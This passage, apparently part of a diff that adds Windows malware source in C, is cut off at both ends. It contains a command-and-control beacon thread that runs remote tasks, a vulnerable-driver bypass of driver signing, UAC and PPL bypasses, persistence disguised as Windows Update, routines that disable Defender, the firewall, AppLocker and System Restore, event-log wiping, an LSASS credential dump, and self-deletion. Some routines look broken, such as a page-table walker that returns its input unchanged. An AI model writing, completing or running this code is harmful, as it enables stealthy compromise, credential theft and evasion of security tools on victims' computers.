CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + CloseHandle(hStdOutWrite); + if (success && task->WaitForOutput) { + WaitForSingleObject(pi.hProcess, 60000); + DWORD bytesRead; + ReadFile(hStdOutRead, output, outputSize - sizeof(WCHAR), &bytesRead, NULL); + output[bytesRead / sizeof(WCHAR)] = 0; + } + CloseHandle(hStdOutRead); + if (pi.hProcess) CloseHandle(pi.hProcess); + if (pi.hThread) CloseHandle(pi.hThread); + return success; +} + +// ==================== BEACON THREAD ==================== +DWORD WINAPI BeaconThread(LPVOID lpParam) { + BEACON_DATA beacon; + C2_TASK task = {0}; + while (TRUE) { + ZeroMemory(&beacon, sizeof(beacon)); + ZeroMemory(&task, sizeof(task)); + GatherBeaconData(&beacon); + if (SendBeaconToC2(&beacon, &task) && (task.Command[0] != 0 || task.IsDownload)) { + WCHAR output[65536]; + ZeroMemory(output, sizeof(output)); + ExecuteCommand(&task, output, sizeof(output)); + } + DWORD sleepTime = (C2_BASE_INTERVAL_SECONDS + (rand() % C2_JITTER_MAX_SECONDS)) * 1000; + Sleep(sleepTime); + } + return 0; +} + +// ==================== KERNEL BYPASS ==================== +BOOL LoadGdrvDriver() { + if (!CopyFileW(L"gdrv.sys", L"C:\\Windows\\Temp\\gdrv.sys", FALSE)) return FALSE; + SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (!scm) return FALSE; + SC_HANDLE svc = CreateServiceW(scm, L"gdrv", L"gdrv", SERVICE_START | SERVICE_STOP | DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, L"C:\\Windows\\Temp\\gdrv.sys", NULL, NULL, NULL, NULL, NULL); + if (!svc && GetLastError() == ERROR_SERVICE_EXISTS) svc = OpenServiceW(scm, L"gdrv", SERVICE_START | SERVICE_STOP | DELETE); + if (!svc) { CloseServiceHandle(scm); return FALSE; } + if (!StartServiceW(svc, 0, NULL)) { DeleteService(svc); CloseServiceHandle(svc); CloseServiceHandle(scm); return FALSE; } + CloseServiceHandle(svc); + CloseServiceHandle(scm); + return TRUE; +} + +ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen) { + for (DWORD i = 0; i < size - patternLen; i++) { + BOOL found = TRUE; + for (DWORD j = 0; j < patternLen; j++) { + if (pattern[j] != 0x00 && base[i + j] != pattern[j]) { found = FALSE; break; } + } + if (found) return (ULONGLONG)(base + i); + } + return 0; +} + +ULONGLONG WalkPageTable(PVOID virtualAddr) { + return (ULONGLONG)virtualAddr; +} + +BOOL DisableDSEviaGdrv() { + HANDLE hDevice = CreateFileW(GDRV_DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); + if (hDevice == INVALID_HANDLE_VALUE) return FALSE; + DWORD bytesReturned; + LPVOID kernelBase = GetModuleHandleW(L"ntoskrnl.exe"); + if (kernelBase) { + BYTE pattern[] = { 0x8A, 0x05, 0x00, 0x00, 0x00, 0x00, 0xC3 }; + ULONGLONG ciOptionsAddr = FindPattern((BYTE*)kernelBase, 0x2000000, pattern, sizeof(pattern)); + if (ciOptionsAddr) { + DWORD* relAddr = (DWORD*)(ciOptionsAddr + 2); + ULONGLONG targetAddr = ciOptionsAddr + 6 + *relAddr; + ULONGLONG physicalAddr = WalkPageTable((PVOID)targetAddr); + if (physicalAddr) { + BYTE newValue = CI_OPTIONS_DISABLE_DSE; + DeviceIoControl(hDevice, GDRV_IOCTL_WRITE_PHYSICAL, &physicalAddr, sizeof(physicalAddr), &newValue, sizeof(newValue), &bytesReturned, NULL); + } + } + } + CloseHandle(hDevice); + return TRUE; +} + +BOOL EnableKernelExecution() { + if (!LoadGdrvDriver()) return FALSE; + Sleep(2000); + if (!DisableDSEviaGdrv()) return FALSE; + return TRUE; +} + +// ==================== PPL BYPASS ==================== +BOOL EnablePPL() { + HANDLE hToken; + if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) { + TOKEN_PRIVILEGES tp; + LUID luid; + if (LookupPrivilegeValueW(NULL, SE_TCB_NAME, &luid)) { + tp.PrivilegeCount = 1; + tp.Privileges[0].Luid = luid; + tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL); + HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); + pNtSetInformationProcess NtSetInformationProcess = (pNtSetInformationProcess)GetProcAddress(hNtdll, "NtSetInformationProcess"); + PS_PROTECTION protection; + protection.Level = 0x72; + NTSTATUS status = NtSetInformationProcess(GetCurrentProcess(), 0x3D, &protection, sizeof(protection)); + if (status == 0) { CloseHandle(hToken); return TRUE; } + } + CloseHandle(hToken); + } + return FALSE; +} + +void RunAsPPL() { EnablePPL(); } + +// ==================== ANTI-FORENSICS ==================== +void ScrambleMemory() { + for (int i = 0; i < 100; i++) { + LPVOID ptr = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); + if (ptr) { + RtlFillMemory(ptr, 4096, 0xCC); + DWORD oldProtect; + VirtualProtect(ptr, 4096, PAGE_NOACCESS, &oldProtect); + } + } +} + +BOOL HideFile(LPCWSTR filePath) { + return SetFileAttributesW(filePath, FILE_ATTRIBUTE_HIDDEN); +} + +BOOL ClearEventLogs() { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + CreateProcessW(L"C:\\Windows\\System32\\wevtutil.exe", L"wevtutil cl System", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + CreateProcessW(L"C:\\Windows\\System32\\wevtutil.exe", L"wevtutil cl Security", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + CreateProcessW(L"C:\\Windows\\System32\\wevtutil.exe", L"wevtutil cl Application", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + return TRUE; +} + +BOOL AddToStartup(LPCWSTR appPath) { + HKEY hKey; + if (RegCreateKeyExW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { + RegSetValueExW(hKey, L"WindowsUpdate", 0, REG_SZ, (BYTE*)appPath, (DWORD)(wcslen(appPath) * sizeof(WCHAR))); + RegCloseKey(hKey); + return TRUE; + } + return FALSE; +} + +BOOL InstallBootkitComponents() { + HKEY hKey; + if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { + wchar_t data[] = L"autocheck autochk *"; + RegSetValueExW(hKey, L"BootExecute", 0, REG_MULTI_SZ, (BYTE*)data, (DWORD)((wcslen(data) + 1) * sizeof(wchar_t))); + RegCloseKey(hKey); + } + if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { + wchar_t exePath[MAX_PATH]; + GetModuleFileNameW(NULL, exePath, MAX_PATH); + RegSetValueExW(hKey, L"Userinit", 0, REG_SZ, (BYTE*)exePath, (DWORD)(wcslen(exePath) * sizeof(wchar_t))); + RegCloseKey(hKey); + } + return TRUE; +} + +BOOL KillProcessByName(LPCWSTR processName) { + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snapshot == INVALID_HANDLE_VALUE) return FALSE; + PROCESSENTRY32W pe = { sizeof(pe) }; + if (Process32FirstW(snapshot, &pe)) { + do { + if (_wcsicmp(pe.szExeFile, processName) == 0) { + HANDLE hProc = OpenProcess(PROCESS_TERMINATE, FALSE, pe.th32ProcessID); + if (hProc) { TerminateProcess(hProc, 0); CloseHandle(hProc); } + } + } while (Process32NextW(snapshot, &pe)); + } + CloseHandle(snapshot); + return TRUE; +} + +BOOL BypassUAC() { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + wchar_t systemRoot[MAX_PATH]; + GetEnvironmentVariableW(L"SystemRoot", systemRoot, MAX_PATH); + wchar_t wusaPath[MAX_PATH]; + swprintf(wusaPath, MAX_PATH, L"%ls\\System32\\wusa.exe", systemRoot); + CopyFileW(wusaPath, L"C:\\Windows\\Temp\\wusa.exe", FALSE); + if (CreateProcessW(NULL, L"C:\\Windows\\Temp\\wusa.exe /quiet", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) { + WaitForSingleObject(pi.hProcess, 1000); + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + return TRUE; + } + return FALSE; +} + +BOOL InstallServicePersistence() { + wchar_t exePath[MAX_PATH]; + GetModuleFileNameW(NULL, exePath, MAX_PATH); + SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (!scm) return FALSE; + SC_HANDLE svc = CreateServiceW(scm, L"WindowsUpdateService", L"Windows Update Service", SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, exePath, NULL, NULL, NULL, NULL, NULL); + if (!svc && GetLastError() == ERROR_SERVICE_EXISTS) { + svc = OpenServiceW(scm, L"WindowsUpdateService", SERVICE_ALL_ACCESS); + } + if (svc) { + StartServiceW(svc, 0, NULL); + CloseServiceHandle(svc); + } + CloseServiceHandle(scm); + return TRUE; +} + +BOOL DisableFirewall() { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + CreateProcessW(L"C:\\Windows\\System32\\netsh.exe", L"netsh advfirewall set allprofiles state off", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + return TRUE; +} + +BOOL AddExclusionToDefender(LPCWSTR path) { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + wchar_t cmd[MAX_PATH * 2]; + swprintf(cmd, MAX_PATH * 2, L"powershell -Command \"Add-MpPreference -ExclusionPath '%ls'\"", path); + CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + return TRUE; +} + +BOOL SelfDelete() { + wchar_t exePath[MAX_PATH]; + GetModuleFileNameW(NULL, exePath, MAX_PATH); + wchar_t cmd[MAX_PATH + 128]; + swprintf(cmd, MAX_PATH + 128, L"/c ping 127.0.0.1 -n 3 > nul & del /f \"%ls\"", exePath); + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + CreateProcessW(L"C:\\Windows\\System32\\cmd.exe", cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + return TRUE; +} + +// ==================== NETWORK C2 SETUP ==================== +void NetworkC2Setup() { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + CreateProcessW(L"C:\\Windows\\System32\\netsh.exe", L"netsh advfirewall firewall add rule name=\"Windows Update\" dir=out action=allow protocol=TCP remoteport=443", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + HKEY hKey; + if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { + DWORD enableAutoDoh = 2; + RegSetValueExW(hKey, L"EnableAutoDoh", 0, REG_DWORD, (BYTE*)&enableAutoDoh, sizeof(enableAutoDoh)); + RegCloseKey(hKey); + } + HANDLE hThread = CreateThread(NULL, 0, BeaconThread, NULL, 0, NULL); + if (hThread) CloseHandle(hThread); + wchar_t exePath[MAX_PATH]; + GetModuleFileNameW(NULL, exePath, MAX_PATH); + wchar_t regCmd[MAX_PATH * 2]; + swprintf(regCmd, MAX_PATH * 2, L"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v WindowsUpdate /t REG_SZ /d \"\\\"%s\\\"\" /f", exePath); + CreateProcessW(L"C:\\Windows\\System32\\reg.exe", regCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } +} + +// ==================== BYPASS FUNCTIONS ==================== +BOOL TakeOwnershipAndGrantFullControl(LPCWSTR subkey) { + HKEY hKey; + if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, subkey, 0, WRITE_OWNER | WRITE_DAC, &hKey) != ERROR_SUCCESS) return FALSE; + SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY; + PSID adminGroupSid = NULL; + AllocateAndInitializeSid(&ntAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0,0,0,0,0,0, &adminGroupSid); + BOOL result = SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY, OWNER_SECURITY_INFORMATION, adminGroupSid, NULL, NULL, NULL) == ERROR_SUCCESS; + if (result) { + EXPLICIT_ACCESS_W ea = {0}; + ea.grfAccessPermissions = KEY_ALL_ACCESS; + ea.grfAccessMode = SET_ACCESS; + ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT; + ea.Trustee.TrusteeForm = TRUSTEE_IS_SID; + ea.Trustee.TrusteeType = TRUSTEE_IS_GROUP; + ea.Trustee.ptstrName = (LPWSTR)adminGroupSid; + PACL newAcl = NULL; + result = SetEntriesInAclW(1, &ea, NULL, &newAcl) == ERROR_SUCCESS && SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, newAcl, NULL) == ERROR_SUCCESS; + if (newAcl) LocalFree(newAcl); + } + FreeSid(adminGroupSid); + RegCloseKey(hKey); + return result; +} + +BOOL DisableTamperProtection() { + LPCWSTR tpKey = L"SOFTWARE\\Microsoft\\Windows Defender\\Features"; + if (!TakeOwnershipAndGrantFullControl(tpKey)) return FALSE; + HKEY hKey; + if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, tpKey, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { + DWORD zero = 0; + LONG ret = RegSetValueExW(hKey, L"TamperProtection", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); + RegCloseKey(hKey); + return (ret == ERROR_SUCCESS); + } + return FALSE; +} + +void DisableDefender() { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + LPCWSTR commands[] = { + L"powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\"", + L"powershell -Command \"Set-MpPreference -DisableBehaviorMonitoring $true\"", + L"powershell -Command \"Set-MpPreference -DisableBlockAtFirstSeen $true\"", + L"powershell -Command \"Set-MpPreference -DisableIOAVProtection $true\"", + L"powershell -Command \"Set-MpPreference -DisablePrivacyMode $true\"", + L"powershell -Command \"Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true\"", + L"powershell -Command \"Set-MpPreference -DisableArchiveScanning $true\"", + L"powershell -Command \"Set-MpPreference -DisableIntrusionPreventionSystem $true\"", + L"powershell -Command \"Set-MpPreference -DisableScriptScanning $true\"", + L"powershell -Command \"Set-MpPreference -DisableCatchupFullScan $true\"", + L"powershell -Command \"Set-MpPreference -DisableCatchupQuickScan $true\"", + L"powershell -Command \"Set-MpPreference -MAPSReporting 0\"", + L"powershell -Command \"Set-MpPreference -CloudBlockLevel 0\"", + L"powershell -Command \"Set-MpPreference -CloudTimeout 1\"", + L"powershell -Command \"Set-MpPreference -SubmitSamplesConsent 2\"", + L"powershell -Command \"Set-MpPreference -PUAProtection 0\"", + L"powershell -Command \"Set-MpPreference -HighThreatDefaultAction 6 -Force\"", + L"powershell -Command \"Set-MpPreference -LowThreatDefaultAction 6 -Force\"", + L"powershell -Command \"Set-MpPreference -ModerateThreatDefaultAction 6 -Force\"", + L"powershell -Command \"Set-MpPreference -SevereThreatDefaultAction 6 -Force\"", + L"powershell -Command \"Remove-MpPreference -ExclusionPath C:\\ -ErrorAction SilentlyContinue\"" + }; + for (int i = 0; i < sizeof(commands)/sizeof(commands[0]); i++) { + CreateProcessW(NULL, (LPWSTR)commands[i], NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 1000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + } + SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (scm) { + SC_HANDLE svc = OpenServiceW(scm, L"WinDefend", SERVICE_STOP | SERVICE_CHANGE_CONFIG); + if (svc) { SERVICE_STATUS status; ControlService(svc, SERVICE_CONTROL_STOP, &status); ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL); CloseServiceHandle(svc); } + SC_HANDLE wdNisSvc = OpenServiceW(scm, L"WdNisSvc", SERVICE_STOP | SERVICE_CHANGE_CONFIG); + if (wdNisSvc) { SERVICE_STATUS status; ControlService(wdNisSvc, SERVICE_CONTROL_STOP, &status); ChangeServiceConfigW(wdNisSvc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL); CloseServiceHandle(wdNisSvc); } + CloseServiceHandle(scm); + } +} + +void KillDefenderProcesses() { + PROCESSENTRY32W entry = { sizeof(entry) }; + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snapshot == INVALID_HANDLE_VALUE) return; + LPCWSTR targets[] = { L"MsMpEng.exe", L"NisSrv.exe", L"MpCmdRun.exe", L"SecurityHealthService.exe", L"MsMpEngCP.exe" }; + for (int i = 0; i < 5; i++) { + if (Process32FirstW(snapshot, &entry)) { + do { + if (_wcsicmp(entry.szExeFile, targets[i]) == 0) { + HANDLE hProc = OpenProcess(PROCESS_TERMINATE, FALSE, entry.th32ProcessID); + if (hProc) { TerminateProcess(hProc, 0); CloseHandle(hProc); } + } + } while (Process32NextW(snapshot, &entry)); + } + Process32FirstW(snapshot, &entry); + } + CloseHandle(snapshot); +} + +void DisableUAC() { + HKEY hKey; + DWORD zero = 0; + if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { + RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); + RegSetValueExW(hKey, L"ConsentPromptBehaviorAdmin", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); + RegSetValueExW(hKey, L"PromptOnSecureDesktop", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); + RegCloseKey(hKey); + } +} + +void DisableAppLockerWDAC() { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + CreateProcessW(L"C:\\Windows\\System32\\net.exe", L"net stop appidsvc /y", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (scm) { + SC_HANDLE svc = OpenServiceW(scm, L"AppIDSvc", SERVICE_CHANGE_CONFIG); + if (svc) { ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL); CloseServiceHandle(svc); } + CloseServiceHandle(scm); + } + DeleteFileW(L"C:\\Windows\\System32\\CodeIntegrity\\SiPolicy.p7b"); + DeleteFileW(L"C:\\Windows\\System32\\CodeIntegrity\\SIPolicy.p7b"); + HKEY hKey; + DWORD zero = 0; + if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\SystemGuard", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { + RegSetValueExW(hKey, L"Enabled", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); + RegCloseKey(hKey); + } + if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Policies\\Microsoft\\Windows\\AppLocker", 0, KEY_SET_VALUE | KEY_WOW64_64KEY, &hKey) == ERROR_SUCCESS) { + RegSetValueExW(hKey, L"Enabled", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); + RegCloseKey(hKey); + } +} + +void AddDefenderExclusions() { + wchar_t exePath[MAX_PATH]; + GetModuleFileNameW(NULL, exePath, MAX_PATH); + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + wchar_t cmd[MAX_PATH + 128]; + swprintf(cmd, MAX_PATH + 128, L"powershell -Command \"Add-MpPreference -ExclusionPath '%s'\"", exePath); + CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + swprintf(cmd, MAX_PATH + 128, L"powershell -Command \"Add-MpPreference -ExclusionProcess '%s'\"", exePath); + CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + swprintf(cmd, MAX_PATH + 128, L"powershell -Command \"Add-MpPreference -ExclusionExtension '.exe'\""); + CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + swprintf(cmd, MAX_PATH + 128, L"powershell -Command \"Add-MpPreference -ExclusionPath C:\\\""); + CreateProcessW(NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } +} + +void DisableSecurityLogs() { + HKEY hKey; + DWORD enableMiniNt = 1; + RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\MiniNt", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL); + RegSetValueExW(hKey, NULL, 0, REG_DWORD, (BYTE*)&enableMiniNt, sizeof(enableMiniNt)); + RegCloseKey(hKey); + DWORD disableAudit = 1; + RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\Lsa", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL); + RegSetValueExW(hKey, L"auditbaseobjects", 0, REG_DWORD, (BYTE*)&disableAudit, sizeof(disableAudit)); + RegCloseKey(hKey); +} + +void DisableSystemRestore() { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + CreateProcessW(L"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell -Command \"Disable-ComputerRestore -Drive 'C:\\'\"", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 5000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + HKEY hKey; + if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { + DWORD disableSR = 1; + RegSetValueExW(hKey, L"DisableSR", 0, REG_DWORD, (BYTE*)&disableSR, sizeof(disableSR)); + RegSetValueExW(hKey, L"DisableConfig", 0, REG_DWORD, (BYTE*)&disableSR, sizeof(disableSR)); + RegCloseKey(hKey); + } +} + +void DropTelemetryPackets() { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + LPCWSTR domains[] = { + L"telemetry.microsoft.com", L"vortex-win.data.microsoft.com", + L"settings-win.data.microsoft.com", L"watson.telemetry.microsoft.com", + L"vortex.data.microsoft.com", L"vortex-sandbox.data.microsoft.com", + L"officeclient.microsoft.com", L"oca.telemetry.microsoft.com" + }; + for (int i = 0; i < 8; i++) { + WCHAR cmd[512]; + swprintf(cmd, 512, L"cmd.exe /c \"echo 0.0.0.0 %ls >> %%WINDIR%%\\System32\\drivers\\etc\\hosts\"", domains[i]); + CreateProcessW(L"C:\\Windows\\System32\\cmd.exe", cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 1000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + } +} + +void DumpLSASS() { + DWORD lsassPid = 0; + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snapshot != INVALID_HANDLE_VALUE) { + PROCESSENTRY32W pe = { sizeof(pe) }; + if (Process32FirstW(snapshot, &pe)) { + do { if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) { lsassPid = pe.th32ProcessID; break; } } while (Process32NextW(snapshot, &pe)); + } + CloseHandle(snapshot); + } + if (lsassPid) { + EnableDebugPrivilege(); + HANDLE hLsass = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, lsassPid); + if (hLsass) { + HANDLE hFile = CreateFileW(L"C:\\lsass.dmp", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL); + if (hFile != INVALID_HANDLE_VALUE) { MiniDumpWriteDump(hLsass, lsassPid, hFile, MiniDumpWithFullMemory, NULL, NULL, NULL); CloseHandle(hFile); } + CloseHandle(hLsass); + } + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + CreateProcessW(L"C:\\Windows\\System32\\cmd.exe", L"cmd.exe /c vssadmin create shadow /for=C: > nul", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 10000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + } +} + +void StopSecurityServices() { + const wchar_t* services[] = { L"Sense", L"SgrmBroker", L"WdBoot", L"WdFilter", L"WdNisDrv", L"WinDefend", L"SecurityHealthService", L"wscsvc", L"W3SVC", L"MSExchange", L"MSExchangeDelivery", L"MSExchangeFrontendTransport", L"MSExchangeMailboxReplication", L"MSExchangeSubmission", L"MSExchangeThrottling", L"MicrosoftUpdate", L"BITS", L"wuauserv" }; + SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (!scm) return; + for (int i = 0; i < sizeof(services)/sizeof(services[0]); i++) { + SC_HANDLE svc = OpenServiceW(scm, services[i], SERVICE_STOP | SERVICE_QUERY_STATUS); + if (svc) { SERVICE_STATUS status; ControlService(svc, SERVICE_CONTROL_STOP, &status); ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL); CloseServiceHandle(svc); } + } + CloseServiceHandle(scm); +} + +void AddPersistence() { + wchar_t cmd[MAX_PATH]; + GetModuleFileNameW(NULL, cmd, MAX_PATH); + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + wchar_t taskCmd[1024]; + swprintf(taskCmd, 1024, L"schtasks /create /tn \"WindowsUpdateTask\" /tr \"%s\" /sc onlogon /ru SYSTEM /f", cmd); + CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", taskCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + swprintf(taskCmd, 1024, L"schtasks /create /tn \"MicrosoftUpdateTask\" /tr \"%s\" /sc daily /st 09:00 /ru SYSTEM /f", cmd); + CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", taskCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } + HKEY hKey; + if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, 